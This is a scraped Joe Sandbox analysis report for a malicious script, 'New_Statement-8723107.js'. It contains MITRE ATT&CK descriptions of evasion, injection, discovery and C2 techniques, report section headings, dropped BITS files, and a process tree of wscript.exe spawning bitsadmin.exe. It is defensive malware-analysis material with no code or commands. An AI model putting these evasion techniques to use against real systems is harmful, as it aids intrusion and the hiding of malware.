Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report New_Statement-8723107.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: wscript.exePID: 3328, Parent PID: 4004

General

Chronological Activities

Analysis Process: bitsadmin.exePID: 6324, Parent PID: 3328

Windows Analysis Report
New_Statement-8723107.js